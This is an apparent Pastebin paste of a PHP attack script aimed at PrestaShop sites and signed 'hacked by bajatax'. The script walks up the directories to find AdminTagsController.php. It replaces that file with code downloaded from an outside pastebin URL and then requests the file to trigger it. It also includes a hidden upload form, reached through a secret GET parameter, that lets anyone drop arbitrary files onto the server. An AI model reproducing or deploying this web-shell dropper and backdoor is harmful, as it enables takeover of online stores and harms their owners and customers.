dragondevile

b_prestashop

Jul 10th, 2017
442
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. error_reporting(0);
  4. set_time_limit(0);
  5.  
  6. echo "hacked by bajatax";
  7. $sss=array('/','../','../../','../../../','../../../../','../../../../../');
  8. foreach($sss as $pa){
  9. $preg = "controllers/admin/AdminTagsController.php";
  10. $p1=array("$pa/$preg");
  11. foreach($p1 as $path){
  12. if (file_exists("$path"))
  13. {$a = $_SERVER['SERVER_NAME'];
  14. $html = @file_get_contents('https://pastebin.com/raw/GxS664uu');$save=fopen($path,'w');
  15. fwrite($save,$html); file_get_contents("http://$a/$preg"); echo "<br> ./done panel <br>";
  16. }}}if($_GET['up']=="hous"){
  17. echo '<center><font color="Red" size="4">';
  18. /// Script Upload By amine \\\
  19. if(isset($_POST['Submit'])){
  20.     $filedir = "";
  21.     $maxfile = '2000000';
  22.     $mode = '0644';
  23.     $userfile_name = $_FILES['image']['name'];
  24.     $userfile_tmp = $_FILES['image']['tmp_name'];
  25.     if(isset($_FILES['image']['name'])) {
  26.         $qx = $filedir.$userfile_name;
  27.         @move_uploaded_file($userfile_tmp, $qx);
  28.         @chmod ($qx, octdec($mode));
  29. echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>";
  30. }
  31. }
  32. else{
  33. echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
  34. }
  35. echo "<br> fkhatr ga3 l3chran houus :D <br>";
  36. echo '</center></font>';
  37.  
  38. }
  39. ?>
Add Comment
Please, Sign In to add comment